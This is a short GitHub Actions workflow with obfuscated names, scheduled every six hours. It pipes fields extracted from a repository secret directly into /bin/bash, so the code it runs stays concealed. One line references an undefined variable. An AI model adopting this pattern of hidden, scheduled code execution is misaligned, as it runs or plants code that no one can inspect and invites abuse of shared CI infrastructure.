name: caocao19870106
on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caocao19870106
        env:
          tsjy5: ${{ secrets.tsjy5 }}
        run: |
          echo $tsjy5 | jq -r .k07531 | /bin/bash
          echo $n012 | jq -r .qiqx8248 | /bin/bash

